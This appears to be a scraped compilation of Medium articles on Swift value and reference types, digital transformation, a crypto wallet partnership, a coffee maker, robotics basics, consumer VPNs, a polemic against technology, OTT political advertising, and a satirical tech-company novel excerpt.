Just like other object-oriented programming languages, Swift has classes as building blocks which can define methods, properties, initializers, and can conform to protocols, support inheritance & polymorphism.👍
But, wait wait wait…🖐🖐🖐
Swift has structs also and it can define methods, properties, initializers and can conform to protocols with only one exception of inheritance.😳
What? Now I am confused!!! 🤔🤔🤔
Now let’s spice up your confusion: structs are not only the value types in Swift. Tuples and enums are also value types. Classes are also not the only one used as a reference type. Functions and closures are also reference types. But as a token of relief, we at least know the primary focus & specialization of usage of these types.😟
So up to this point, we are left with only one big confusion with the usage of structs and classes.🤬
So, let’s go and clear the confusions going around.💁♂️
Storage Locations
There are three types of storage available:
Register 🚀
Stack ☄️
Heap 🎯
The objects that have a shorter lifespan are stored inside registers or the stack and those that have a longer lifespan are stored inside the heap.👍
A value type stores its contents in memory allocated in the stack, so we can say value types are allocated in the stack in Swift. 🤫
But there is a common misconception about value types, have you heard it?💁♂️
The misconception is that most people think value types are always stored in the Stack.
❌❌ Wait a minute — this is not the case always. ❌❌
Value types can be stored inside the stack when they are either temporary or local variables. But what if a value type is contained inside a reference type?
In this situation, it can be stored inside the heap memory. 😆
Wow…that’s cool!!!🆒
So the value types can be stored inside the register, stack or heap depending on their lifespan, whether they are short lived or long lived. If it is a local variable it can live inside the stack and if it is a part of class then it can live inside heap memory also.✅
On the other hand, reference type stores its contents in memory allocated in the heap memory and the variable holds only a reference to that memory location where actual data has been stored. 💠💠
How does it work for reference type?🧐
So for reference type, it is quite a common situation when there can be several variables holding the reference to the same memory location.⚔️
When a value type instance is assigned to a variable or passed to a function, the instance is copied and assigned to that variable. But with the reference type, only the reference gets copied and the new variable holds the same reference to the same memory location. 🌞
Differences in terms of Mutability
There can be two states for a variable:
💂♀ ️Mutable 💂♀
🕵️♂️ Immutable 🕵️♂️
If a value type instance is assigned to an immutable variable, then the instance also becomes immutable. As a result, we can not make any changes to that instance.🤦♂️
Only if a value type instance is assigned to a mutable variable does the instance become mutable. 🙋‍♂️
But things are totally different for reference types. The variable and the instance it is assigned to are totally different things. If we declare an immutable variable holding a reference to a class instance, this means that the reference it is holding will never change. We cannot change the reference, and it will always point to the same instance. 🎯
Structural Types
Values of structural types are compared for equality in terms of their attributes or elements. We can say a value type is equal to another if and only if all of the corresponding attributes are equal. 🤬🤬🤬
Umm…too many strong words…what do you mean??🤔
Let’s say, we have a Person value type which has attributes like firstName and lastName.
struct Person {
    var firstName: String
    var lastName: String
}

var person1 = Person(firstName: "foo", lastName: "bar")
var person2 = Person(firstName: "foo", lastName: "bar")
Here both person1 & person2 instances are holding the same value for firstName (“foo”) and lastName (“bar”). So as per our understanding, we can say that the two instances are equal to each other since their attributes (firstName & lastName) are holding the same values.
But it’s not only limited to this: in the future, any two person instances holding the same values for firstName & lastName will be equal to each other.
So as per our understanding till this point, we can say that:
Value Types do not have identity, so there can be no reference to them. Value types are faceless.🤯
What? How can you say that?😷😷😷
var myAge: Int = 21
var friendAge: Int = 21
Both myAge & friendAge are integer type variable with value 21.
Can we distinguish one from the other? 🥺
No, because they are holding the same value.🍺
An integer variable with value 21 cannot be different from another integer variable which is also having the value 21. As simple as that.👏👏👏
Not having an identity gives value types another advantage: if you think practically, then you can imagine that if you do not have an identity, anyone with the same characteristics can replace or substitute you. 😱😱😱
The same we can think for us as humans also. If I don’t have an identity then anyone with same characteristics can replace me😡😡😡. It’s good for us that we have an identity otherwise it would be a great risk to our existence.😳
But for value types, they don’t have an identity and it is an advantage to them. 🤘
What are the benefits of using Value Types?
💪 No Race Conditions and Deadlocks: 💪
For value types in a multi-threaded environment, it is impossible for one thread to mutate the state of an instance while it is being used by another thread. So we can say that there will be no race conditions or deadlocks.
⚔️ No Retain Cycles: ⚔️
When two reference type instances hold strong references to each other and prevent each other from being deallocated from memory, it is called a retain cycle. Since value types are not references, there will be no retain cycles for value types.
👨👨👧👧 Automatic Reference Counting: 👨👨👧👧
For reference type, Swift uses automatic reference counting to keep track of all the live or active objects and deallocates the instance only when there are no more strong references to it. If we think a little bit, then we can say that it is kind of a heavy operation because Swift runtime needs to keep track of the objects always. But since value types are allocated in the stack, it does not need ARC. So it is cheaper and faster🐆🐆.
But wait...How does it manage memory for Array, Dictionary and String?🤔
Since we cannot know the actual size of an array, a dictionary, or a string at compile time, there is no way for them to be allocated on the stack. Though they are value types internally, they cannot be allocated on the stack. They need to be allocated in heap memory, and to manage this, Swift comes up with copy-on-write.😎
But what is this?😩
When we say one instance is a copy of another instance, this really means they are the same, that they contain the same values. But in Swift, for the types above (Array, Dictionary, String, etc.), an actual copy is made on the heap only when an instance is mutated. This is called a performance optimization technique for value types.🤩🤩🤩
Conclusion
There is no hard rule which defines when to use value type and when to use reference type. Value types have some unique advantages over reference types and vice versa. They both are unique in their own way. It really depends on your requirements and what you are trying to achieve. You should know the semantics of your code because you only know your code best, so it’s up to you to choose. You have the full freedom.
So rather than fighting over value type vs reference type, use them intelligently.
🙏🙏🙏 Cheers!!! Thank you for reading!! 🙏🙏🙏
✅✅✅You can find me on Twitter.✅✅✅ | https://medium.com/free-code-camp/the-story-of-one-mother-two-sons-value-type-vs-reference-type-in-swift-6e125af2d5d0 | ['Boudhayan Biswas'] | 2019-05-21 16:47:32.315000+00:00 | ['Technology', 'Mobile', 'iOS', 'Swift', 'Programming'] |
185 | Can iterative digital change help businesses mitigate risk? | Can iterative digital change help businesses mitigate risk?
Clare Gledhill, operations and strategic development director at strategic change agency CDS explores how iterative digital change can help mitigate risk. Top Business Tech Dec 23, 2021·5 min read
Risk mitigation has always formed a key part of businesses’ success strategies, and that’s because all companies are faced with risk. While no one can always foresee the issues that will arise, having mechanisms in place to help mitigate, evaluate, manage, and resolve them can help an organization keep running smoothly, should a few bumps in the road occur.
Across the globe, the risk landscape arguably became even more unpredictable and turbulent with the onset of the pandemic, in many cases highlighting the vulnerability of organizations. As a result, firms worldwide have needed to demonstrate high levels of resilience and the ability to adapt and cope with the challenges thrown up by the virus or, alternatively, run the risk of having to close their doors permanently.
However, when it comes to planning for risk, there are many categories for business owners to be aware of; each comes with its own challenges. From operational and financial to compliance and reputational, companies need to proactively plan for these scenarios, not to eliminate risk but help preserve the trust and loyalty they’ve built up with their customers if the worst happens.
Accelerated digital transformation
It is no secret that, to help navigate the uncharted waters of the pandemic, many companies looked to bolster their digital infrastructure to improve and streamline their processes and meet demand. For firms that already had advanced technology in place, this simply meant investing in unified communications and collaboration (UC&C) software (such as Microsoft Teams or Zoom) to keep staff connected while working from home. For others, in contrast, it meant a complete overhaul of their legacy systems and practices.
The wake-up call that came in the form of the pandemic caused many business owners to realize that their existing tech stacks and internal systems were no longer fit for purpose, especially with the shift to hybrid working models, or they didn’t meet the high expectations of both their staff and customers. Therefore, businesses looked to transform digitally to help weather the immediate storm and futureproof their systems and enhance their resilience.
Iterative digital change and risk mitigation
In today's increasingly competitive marketplace, private sector firms strive to deliver more value and revenue, and public sector organizations are trying to offer better services. However, both share the common goals of increased flexibility, leaner processes, and an optimized user experience.
Legacy systems can sometimes be a bottleneck in achieving these goals. In fact, a survey recently revealed that 70% of global CXOs see mainframe and legacy modernization as a top business priority. Another study also found that replacing legacy systems was one of the top 10 IT investments for companies in 2020.
Organizations don’t have to worry necessarily about re-platforming immediately, changing all existing systems and infrastructure at once, as, in the current economic climate, this may feel like a monumental task. Instead, choosing the right tech or understanding where an existing solution lets the company down is the logical first step. This can feel less daunting and more achievable than a complete re-platforming project.
By following a more iterative approach to digital change, organizations can implement newer, quicker, and futureproofed technology that supports, not hinders, at a comfortable rate for the business. As a result, this ensures effective scalability, efficiency, and sustainability, without pressure to adapt and change everything simultaneously.
Aging legacy technologies that no longer support developments, content personalization, or updates can leave companies vulnerable to a wide variety of risks. Whether a security breach, downtime, inefficient back-end processes, or user frustration, this often conflicts with society’s ‘inflated expectations.’
Savvy, intuitive technologies are used by many people daily in their personal and professional lives. Those that genuinely delight in terms of their experience are the successful ones, used time and time again. Seamless, integrated, positive experiences are what people expect as standard from modern-day organizations. When executed with empathic experience and communications at its heart, this helps build authentic trust between brands and their audiences.
Looking at this from a financial and efficiency angle, if legacy systems are left in place and an organization builds upon these platforms without considering their constraints and risks, it inevitably runs into limitations and accrues technical debt. Ignoring legacy technologies therefore makes addressing them at a later stage a costly and complex exercise.
Automation goes hand in hand with iterative digital change, too. Automating the more manual and operational tasks helps free up strategic resources, which can be dedicated to other areas of the firm.
Prioritizing behavioral insights
While many organizations think that investing in the latest, most advanced technology will solve all their problems, this really is not the case. Whether or not it involves iterative technical change, the cornerstone of any successful digital transformation journey is a user-centered approach from the start. Knowing exactly who the target audience is and how a firm's technology needs to operate to offer the best possible user experience is vital.
To achieve this, research needs to be carried out into users’ needs, priorities, and expectations, as this will shape the solution bespoke to the business. This ensures it is truly inclusive and accessible to all those who use it. Depending on the systems, this refers not only to external customers but also to internal employees. While a poor digital experience can switch consumers or service users off and impact the outward perception of a company, this can also prevent growth. For instance, if team members feel restricted by inefficient workflows or customers feel frustrated by a lack of empathetic communications, they will be more likely to take their skills and loyalty elsewhere.
Ultimately, iterative technical change is one potential cog in the digital transformation machine. While it may not always be necessary, it’s pivotal to conduct behavioral insight research to determine this — removing any assumptions or guesswork. The research phase will always provide interesting findings, some of which can contradict a business’s views of what they thought they knew about their users.
However, ‘inflated expectations’ are only heading in one direction as technology continues to advance at a swift pace. Looking ahead to 2022 and beyond, meeting the true needs of end-users will arguably matter more than ever before, as both private and public sector organizations strive for a sustainable growth and success strategy with as minimal risk as possible.
Source: https://medium.com/tbtech-news/can-iterative-digital-change-help-businesses-mitigate-risk-6cf85e6162f2 (Top Business Tech, 2021-12-23)
Tokoin x Infinito: A Technology Integration that Brings an Advanced Crypto-based Wallet to a Super App for MSMEs

Admittedly, the cryptocurrency and blockchain industry is bigger than ever. Every passing minute new stakeholders join this ecosystem in hopes of making it big. For those with an interest in crypto and blockchain, Infinito is a name that would definitely ring a bell. A well-known entity in the industry, Infinito made its mark in the tech space in a very short span of time. The company provides various services under the larger Infinito Ecosystem, which aims at bridging the gaps between developers, users, and businesses alike that deal in crypto. They also just recently listed their official token INFT on the Bitmax exchange, marking the achievement of a major milestone for the project.
What is Infinito?
Infinito provides an ecosystem of blockchain products, services, and solutions for users and businesses to manage and grow crypto wealth, plus build and enjoy blockchain applications. Their product makes it possible to make and receive payments in minutes with just a few clicks. Based out of Singapore, Infinito has emerged as the ultimate package when it comes to crypto services. It has successfully merged various services into its product Ecosystem which includes Infinito Wallet, Infinito App Square, Infinito Blockchain Platform, and InfinitoPAY. Currently, Infinito Wallet is a sought after wallet that supports top-tier cryptocurrencies like BTC, ETH, LTC, BCH, EOS, NEO, ADA, DASH, BNB, ONT, XLM, TOMO, DOGE, and has been approved to have 2,000+ tokens supported. Infinito has further proven to be the world’s leading cryptocurrency wallet by boasting more than 450,000 current downloads, and 75,000+ monthly active users. Furthermore, the increasing list of global partners that the company is acquiring, is a testament to their steady growth in the market.
Integration with Tokoin
A recent addition to Infinito's list of growing partners is Indonesia's most prominent blockchain project, Tokoin. The partnership was undertaken recently following Tokoin's global market expansion. Having become the number 1 blockchain project globally, Tokoin is now moving forward to acquire new markets and users, as well as preparing the release of its product. The super app that Tokoin will release for MSMEs requires a lot of technology integration. With the advanced wallet service from Infinito, the partnership will allow Infinito's wallet to be integrated within Tokoin's app. This integration will lead to significant advancement and will make it easier for Tokoin users to deal with digital assets within Tokoin's app.
On the other hand, this partnership will also allow Tokoin to reach out to Infinito's worldwide users, while simultaneously allowing Infinito to expand its market to Indonesian MSMEs. This is especially relevant considering that both Infinito and Tokoin already have strong, wide communities of users worldwide.
We look forward to providing the best and most advanced technology possible for both Tokoin's and Infinito's users, as well as for the global market.

Source: https://medium.com/@tokoin/tokoinxinfinito-c0aeedf04846 (Tokoin Official, 2019-09-09)
My Keurig Says "Please"
It really is the magic word
Author’s photo: My Beloved Coffee Maker — Making Nice
March 2018:
I love technology. I blame my dad. He wasn’t all that in the parenting department — however, he was a tool and die maker and all-around lover of gizmos. A machinist by trade and a tinkerer by design — he adored all things mechanical.
Cars that drive themselves. Computerized everything. Phones that are video cameras/digital cameras/computers/calculators. My dad would have loved it all.
Yeah, I got those genes — not the ones that make great spaghetti sauce. I can troubleshoot most of the equipment and computers I work with. Back in the day when I was an ICU nurse, I discovered my love for gizmos. When I went to the OR, I knew I had landed in heaven. There were more, bigger, brighter toys there.
Which brings me to my coffee maker. I recently bit the bullet and bought a Keurig. I resisted mainly for ecological reasons, but when they came out with reusable pods I was convinced to give it a go.
I have to tell you, I love my coffee maker. It’s programmable and makes damn good coffee. Plus I can use my own favorite blend — which I have a shit-ton of in my freezer. I get it on sale — of course.
But mostly — what I adore about my coffee maker is this: It’s so polite. It’s kind. The last time it needed water — it said please.
In a cruel world, it is the small kindnesses that will make your morning and thus propel you into your day with a smile on your face and a song in your heart. And the caffeine in your bloodstream is just a bonus.
Namaste.

Source: https://medium.com/recycled/my-keurig-says-please-7312a5f129eb (Ann Litts, 2020-09-04)
What is Robotics?
Image credits: RazorRobotics
Robotics is an interdisciplinary field that combines Electrical & Electronics, Computer Science, and Mechanical engineering. Robotics engineers make everything from automatic floor cleaners to robots that perform gymnastics like Atlas (Boston Dynamics).
How do these different disciplines come together?
To understand how the different fields come together, let us look at an example. Nuro (a Silicon Valley startup) does autonomous delivery with self-driving vehicles. On the surface, Nuro autonomously drives and delivers products, but on the inside there is a complex interplay of different engineering systems.
First, let us discuss the cameras, Lidar, and other vision sensors involved in Nuro. These sensors provide information on Nuros’ surroundings. These systems fall under digital control systems/electronics.
Once this data is received, computers run algorithms to detect the environment and to localize the vehicle on the map. As Nuro travels, it maps its path and localizes (locates) itself on the map. All of this falls under the computer science branch.
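As a toy sketch of that localization idea, here is pure dead reckoning from odometry, written in Python purely for illustration. A real system like Nuro's fuses camera and lidar measurements to correct the drift this approach accumulates:

```python
import math

def dead_reckon(pose, moves):
    """Integrate (turn, distance) odometry steps into an (x, y, heading) pose."""
    x, y, theta = pose
    for turn, dist in moves:
        theta += turn                 # rotate first...
        x += dist * math.cos(theta)   # ...then advance along the new heading
        y += dist * math.sin(theta)
    return x, y, theta
```

For example, starting at the origin facing along the x-axis, turning 90 degrees and driving one meter leaves the robot roughly at (0, 1).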
Image credits: Nuro
Once the robot perceives its location and orientation in space and plans its path, Nuro has to control the vehicle and move toward the goal. This is where control systems come into the picture. A control system manages, directs, and regulates the way that the system functions. Based on the current location and final destination, it decides the speed of movement.
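A minimal sketch of that control idea is a one-dimensional proportional controller: the commanded speed shrinks as the vehicle nears the goal, clamped to a speed limit. All numbers and the function name here are hypothetical, chosen just to show the shape of the loop:

```python
def drive_to_goal(position, goal, kp=0.5, max_speed=5.0, dt=0.1, tol=0.01):
    """1-D proportional controller: speed command shrinks as the goal nears."""
    for _ in range(1000):
        error = goal - position
        if abs(error) < tol:
            break
        # Proportional control law, clamped to the vehicle's speed limit
        speed = max(-max_speed, min(max_speed, kp * error))
        position += speed * dt  # simple simulated motion step
    return position
```

Far from the goal the vehicle cruises at `max_speed`; close to it, the command tapers off so the vehicle settles smoothly instead of overshooting.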
Mechanics is the backbone of the robot from structure to design. All control algorithms are written based on the mechanical design of Nuro. It also involves other aspects such as; aerodynamics, materials used, and other thermodynamic considerations.
Mechanics plays a crucial role in robots such as Kuka (a collaborative robot arm), where advanced mechanical engineering equations are used to determine the joint angles required for the arm to reach its desired point in space. It also involves designing the robot's entire physical structure.
Image credits: Kuka
All of these individual disciplines are in rapid development and when they come together they create wonders.
As you might know, the Robotics market is on the constant rise (Check out my previous article).
So we should expect more from the robotics industry. As Boston Dynamics CEO Marc Raibert puts it:
“I happen to believe that robotics will be bigger than the Internet” — Marc Raibert
Is there any other discipline with so much collaboration among other disciplines? Often roboticists take inspiration from the life sciences and the way nature works. This is a field that I believe will change the world drastically in the coming few years. And as a person interested in this field, I would strongly suggest you explore it further and learn more about it.
Hope you found this article interesting. Reach out to me at pramotharun.github.io to talk more about this and more!

Source: https://medium.com/@pramotharun/what-is-robotics-41ec4f6978f4 (Pramoth Arun, 2021-05-22)
What is a VPN and What Does it Actually Provide?!
So What Does a VPN Service ACTUALLY Offer Consumers?
I’m so glad you asked. Especially since I’d just mentioned that we’d be talking about this only a few sentences ago. Reputable VPN services can and do offer solid protections for consumers who wish to take advantage of any of the benefits below…
Benefit #1: Preventing your ISP from seeing the websites where you surf. Right now, your Internet Service Provider (or ISP) has the ability — if they wish — to track where you go online. That includes documenting every website you visit while connected to the Internet via their network. Yeh, I know: it's totally creepy. That information can be sold for advertising purposes and it can also be provided to the authorities (courts, cops, and more) for certain legal purposes. Who's interested in giving away their browsing habits to ANY third party?!? Not me, buster.
So, if you'd like to hide your browsing habits from companies like Comcast, Cox, and AT&T in the US; Orange S.A., Telefonica, and Sky in the EU; and Vodafone or Airtel in India… then, yes: browsing while using a VPN will definitely prevent your ISP from having access to this information. Instead, your ISP will only be able to see that you're logging in to a VPN but… nothing else. Pretty nice feature, I'd say. For those of you who are visual learners, here's a graphic of what implementing a VPN looks like:
Just remember, even though your ISP won’t be able to see your browsing information, the VPN service you decide to trust most certainly WILL be able to see it. Therefore, it’s important to choose a VPN service that protects your safety, security, and privacy. I covered my tips on how to pick a reputable VPN in this episode of my newsletter, so give that read.
Benefit #2: Bypassing your ISP’s efforts to prioritize or restrict certain content. In some countries, certain ISPs prioritize or restrict certain websites or content. T-Mobile, for example, slows down Internet speeds for users who wish to stream video. In the US, Comcast decided to intentionally slow down Netflix for all of its users, a super shitty move. Netflix bowed to the pressure and paid Comcast extra money to end the practice.
However, if you’re using a VPN service, then guess what? Your ISP can’t see which websites you’re visiting online and, therefore, can’t decrease your speed because you’ve chosen to visit a particular website that they don’t like. Thanks, VPN!
Benefit #3: Bypassing the blocks that your ISP or country uses to prevent access to certain websites. Let’s say you live in a repressive country that doesn’t allow access to things like, I don’t know: a free press, women’s rights, LGBTQIA rights, or even pornography. Using a VPN can, in some cases, allow you to bypass those restrictions and surf more comfortably to any website that you might choose for yourself as a free-thinking human. FREEEEEEDOM!!!!!
And, while it’s true that some countries (cough, cough, CHINA) can simply block access to known VPN providers, VPN providers constantly add new servers with new IP addresses, making this cat-and-mouse game forever playable. And endlessly fascinating.
Benefit #4: You can suddenly stream data from another country’s video-on-demand service. The BBC in the UK offers a ton of really cool programming that’s 100% free. So does the CBC in Canada. And if I were online in the UK or in Canada, I’d be able to stream that content freely and easily. However, because I’m geographically located in America, I can’t stream video from those websites to my computer. Ditto, if I’m a paying Netflix customer in the US but am traveling abroad and want access to Netflix’s sweet, sweet American show library. So, yeh, that’s a bummer.
However, if my VPN service offers me the ability to connect to one of their servers in, say, London or Toronto, well… guess what?! I’m now virtually in the UK or Canada and all of that free content is now available to me. Ditto, if I’m traveling abroad in the EU and want access to my paid Netflix account back in the States: I can just connect via my VPN to a US server and presto… I’ve suddenly gained access to the shows I’m already paying to view.
It’s worth noting: some video-on-demand services like Netflix, Amazon Prime, and others block VPN services from accomplishing this. But, again, VPN servers are being added all the time, so just make sure you pick a VPN that offers a free trial. That way, you can test the access you need before you commit to a yearly purchase.
The Summary
Here’s a great video from Tom Scott (a lovely and funny YouTube personality) who digs into this topic with fun, clarity, and a wee bit of sass. That’s because he’s British and having sass is socially acceptable there. Enjoy:
And that's a wrap for today, everyone. Thank you again for reading and for being a subscriber/follower. Please: let me know your thoughts & questions in the comments section.
As always… surf safe.

Source: https://medium.com/swlh/what-is-a-vpn-and-what-does-it-actually-provide-4bebaab3214b (David Koff, 2020-05-16)
The False World
Photo by Greg Rosenke on Unsplash
We sit in our homes consuming content from other places, other people, other worlds. We transport our minds away from here and to the digital ether. It flows into our minds, tethering us, pulling us from the here and now. Our communities, the people around us, are strangers, and those we will likely never meet in person become our closest friends. But the digital world is not real, the real world is around us, yet we have neglected our neighbors, the local businesses, and the impoverished outside of our doors.
The internet was never supposed to become the world; it was supposed to support it, to empower those who wished to break the boundaries of space and time. It did this for a fleeting moment. It actually created a better world for a time. Now, we are detached from the real and imprisoned in our own homes, trapped in our minds. That prison is not real, yet we have submitted ourselves to it.
Our houses used to be what embodied freedom — to own property, to build a home, and construct our private world. We have given this away for free. What our forefathers fought for is now lost. That dream died with them generations ago. Liberation, freedom, we have none.
Our homes are filled with sensors that transmit our every move. We have simply become patterns to keep track of — to tune. We willingly pay for our own imprisonment. We not only pay for the cell but also upgrade it every year because the wardens want us to. Some resist the demand to continue improving the shackles, but without imprisoning yourself, it is quickly becoming impossible to exist in the world. It is taboo to be free. Freedom was only ever an idea — one that could not be allowed to become more than a dream.
We must stop believing in this grand delusion, but we cannot. We have so much become part of the prison that our lives only exist in the mess halls, the prison yard, the television room, and the corridors. It is impossible to imagine a free world because we have never seen one. All we have seen is the illusion of freedom through the words of the wardens. We fear what lies outside of the prison walls because they have told us they are protecting us. Danger beyond the fences, but “you are free” — as long as you don’t break your pattern.
There are approved activities you can engage in, specific ideas you are allowed to entertain. But even the dissidence is a lie. You leave one cell and walk into another. From right to left, from the tame to the extreme, all are allowed. And if a new ideology arises, it is quickly subsumed. Since our very birth, we have been fed lines from scripts, and we continue to play the part. Acting our way through lives as if we said the words coming from our mouths. They were not our words. They were not our thoughts.
We can’t blame our parents, we can’t blame our teachers, for most do not know. And for those who do, they use this knowledge to become wardens of their own. The truth can be leveraged to rise up and step higher on the pyramid.
It takes effort to stand up to the pharaohs of our age. These men and women aim to push us into serfdom once again, yet promise ultimate freedom. We build their pyramids and towers just as the laborers did in Giza. If the Egyptian pharaohs could build their pyramids without the laborers, would they still have a use for them? A time will come where this will be our plight. Domination lies before us.
They do not care for us, but we have been infected with their lies. We have been deceived by a wolf in sheep’s clothing. We watch shadows dancing on the wall of the cave as the sword is readied to strike at our necks. But we can break the shackles, we can overcome the wardens, we can break out of the cave and find the real world. It is out there.
The false world has revealed itself in the last several months. We have seen the wizards behind the curtain, and we mustn’t let them slither away. Although it is difficult to see reality for what it really is, it is time to tear away the veil and see what was always there. Deep down, we feel it is this way, but we fear that truth. We must face trepidation and discern what is really going on in our world. For the world is inverted.
Freedom is tyranny.
Knowledge is illusion.
Leadership is domination.
Science is religion.
Experts know nothing.
Technology is our prison.

Source: https://medium.com/beyond-the-river/the-false-world-354abd9ba679 (Drunk Plato, 2020-06-03)
OTT Is Crucial in the 2020 Election Cycle

If your campaign isn't already using OTT, chances are you're behind the competition. OTT platforms offer a wealth of opportunity to reach consumers in an impactful, cost-effective way. The current shelter-in-place orders have caused OTT usage to trend even further upward. Here's what you need to know to get up to speed.
The Way We Advertise is Changing
Consumers are abandoning their cable providers in favor of streaming services like Roku, Hulu, Netflix, and Amazon Prime Video. It’s predicted 82% of all American households will use these platforms in the next three years.
As we saw in the primaries, political advertisers are migrating their ad budgets to OTT. It’s the smartest move they could make, especially during the general election.
OTT advertising wasn’t the norm even two years ago. Now, OTT surpasses linear TV and other traditional advertising methods in reach alone.
Plain and simple, OTT is growing quickly in popularity and doesn’t show signs of slowing down. There are more than 200 million active users using OTT platforms. According to a recent study by Roku, shelter-in-place orders have caused a massive spike in OTT use. OTT hours have increased 43% since January 2020, with the largest jump happening the week of March 15th. Comparatively, linear TV saw only a 15% spike over that same period.
This is indicative of a larger trend. More households are moving from cable or satellite TV altogether, in favor of OTT platforms. These “cord cutters” continue to grow in number. In the past eight years, the number of US households abandoning their cable has grown 48%. It’s projected that by 2023, 44% of households will have cut the cord.
What’s more impressive than OTT’s reach is how effectively it reaches these audiences.
OTT Outranks Linear TV in Performance
Controls have been put in place to make OTT more powerful and dynamic than any linear TV campaign. The ability to reach granular audience segments and tailor the messages served is a game-changer, particularly in this election year.
OTT ads have a proven engagement rate of three times more and a retention rate that is nearly four times that of linear TV ads. Advertisers can be more strategic and budget-efficient with OTT. Ongoing developments also allow for OTT’s integration into an omnichannel approach that reaches audiences with precision across all platforms.
Precision Targeting. Linear TV casts a wide net that (hopefully) lands on the advertiser's key audience based on age, location, and gender. But OTT allows advertisers to hyper-target key audiences. They can serve strategic ads to viewers by income, ethnicity, zip code, and level of education. Recent developments are creating opportunities for advertisers to target viewers using first- and third-party data, like voter files, coalition lists, or proprietary models like our Atlas influencer targeting lists.

Frequency Caps. Advertisers can cap the frequency of the OTT advertisements served to key audiences and on what platforms. This ensures no under- or over-exposure.

Versioning. OTT can show different messages to different audience segments. Politicians can serve issue-based ads to audiences who will be most receptive to them.
OTT isn’t one size fits all. But it’s the one tactic political campaigns must consider heading into November elections.
Reach out to review your campaign’s performance and learn how to take advantage of the possibilities OTT offers.
Source: https://medium.com/unearth/ott-is-crucial-in-the-2020-election-cycle-eb078d539c85 (2020-05-06)
The Big Disruption

To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] From: Gary Truman ([email protected]) +freespeech@ +libertarians@ +anarchists@ tico — your email is the kind of sentiment that is dragging this company to an early grave and sending our engineers to galt. you're ready to shoot anyone for expressing anything that might possibly be construed as offensive. is that how the internet (or anahata) was built? NO!! the internet was entirely built on offensive content, porn, conspiracy theories, spam, and gambling. don't kill what made our company great. don't kill free speech. don't kill pete or safaris.
The thread continued for hundreds of messages, cutting across racism, poverty, travel tips, sales IQs, and various engineering grosseries, but frequently returning to the issue of bare feet — the battle line falling clearly between sales and engineering. Sales currently seemed to have the upper hand, if only because they woke up earlier. The engineers’ ranks wouldn’t fill out until noon. This gave sales the chance to pile on the anti-engineer vitriol, with little more than a whimper in response.
Arsyen heard Jonas stirring to his right and turned to discover his co-worker sniffling as he read the same email thread on his computer. Jonas lowered himself in his chair and stretched his legs toward the wall, where his shoes sat unoccupied. Using his toes, he dragged the shoes toward his chair.
“I wasn’t made to wear shoes,” Jonas whimpered. The boil on his nose sizzled under his tears.
Arsyen felt a sudden flash of pity for Jonas. Even a boy genius needed to know what it was to run in the fields, to wear shoes — or not wear them — to do as he wished. Instead, Jonas had been forced to work in America at age fourteen, doomed to live as a preteen among a bunch of adults who could drink, date, and surf the internet without parental controls.
Arsyen turned his fingers to the keyboard and began to release the poetry that filled his head: a story of injustice, of choices, of freedom, and Pyrrhian military history. But after five minutes, he hit the table with his fist. His English simply could not capture the words that came so naturally in his native tongue. He deleted his message and started again, settling on something much simpler.
To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected]
From: Arsyen Aimo ([email protected])
Subject: Re: On the subject of engineers’ shoelessness

Sales team suck.

- Arsyen
“Hooray Arsyen!” Jonas cheered, throwing his shoes across the room.
A few minutes later, Arsyen received an email from Roni.
“Awesome response. You’re a real Anahati now! And congrats — the team’s just spoken. You’ve made it past the first week!”
A few minutes later, someone from the HR team appeared next to Arsyen’s desk to hand him his permanent badge.
Arsyen floated through the rest of the day. He walked taller down the corridors and lingered crossing the lawn, flicking his new white badge as he walked, no longer afraid of any passing engineer. He even tried his hand at firing a red badge–carrying newbie, which was even more delightful than he had anticipated.
At home that night, Arsyen cradled the badge in his hand and spoke to it of handmaidens and orphans and all the wonderful things he would one day do for his country. And also which video games he would buy.
Above the profile photo, Arsyen drew a pointy crown on his head in thick black marker.
It was just like being a real prince again.
Gregor Guntlag moved across his office in efficient strides, enjoying the precise cadence of his combat boots thumping against the floor. From crew cut to coccyx, his spine descended in a long, straight line that leaned forward, diagonal to the floor, as though in constant battle with gravity.
At the moment, however, Gregor’s problem was less physics than numbers. Ugly, unsettling numbers. While few people on the Anahata campus knew of its existence, Gregor’s top-secret Project Y was the only endeavor that now mattered at the company. Everything else was an afterthought; a blip in the company’s glorious ten-year history. Were the project to fail, it would mean the end of Anahata. A victory, on the other hand, would ensure the success of Anahata, the web, and all things good for decades to come. It would be Gregor’s finest achievement, the greatest project to which he had ever put his name. He could not allow it to fail.
Yet by the numbers, it was failing, and not for any of the predictable reasons that often plagued brilliant Anahata ideas — an inability to find willing commercial partners, or criticism that Anahata was violating some silly law. Such problems, governed as they were by ignorance and reactionaries, were far outside Gregor’s control. In fact, his current inability to limit these kinds of interference was one of the main reasons Gregor found Project Y so exhilarating. If it succeeded, he would be able to protect his engineers from the ignorant masses, letting them build and create their dreams unencumbered. There would be no more defections to Galt, no more debates in the media about Anahata’s relevance. Project Y would definitively establish Anahata as the most innovative company in the world, ever.
Gregor often found himself wondering what would have become of him had Anahata or Project Y existed in his early days as an engineer, when he first landed on the shores of Baltimore, fresh from the University of Liechtenstein, his head filled with ideas for space elevators and floating castles.
His first major undertaking tackled the many lies and inaccuracies on the internet by using software that automatically corrected inaccurate opinions, comments, and blog posts. But the service never found any mainstream appeal — as one venture capitalist told him, “The internet wasn’t built for facts.”
Next, he embarked on a project to replace the planet’s slavery cages (or zoos, as they were also known) with robotic animal sanctuaries. After four years of working out of his one-room apartment in San Diego, surviving on little more than instant noodles and bananas, Gregor was forced to admit defeat.
But it was there in San Diego, standing next to a dumpster, ready to trash his metal monkey parts, that he met Bobby Bonilo. The future Anahata founder tossed him a quarter, thinking Gregor was homeless. But then Bobby saw the wires sprouting from the monkey’s tail in Gregor’s hand, took in the faded computing slogan on his T-shirt, and in a split second seemed to understand all of Gregor’s dreams — and their crushing defeat at the cruel hand of pragmatism.
Bobby had been the first to recognize Gregor’s genius. “Humans cling to the past. They will work tirelessly to destroy the most important advances of society,” he had said. “As a visionary, you must know that your ideas are ahead of their time. They must only come to light when the world is ready for them — or when you have too much power to be stopped.”
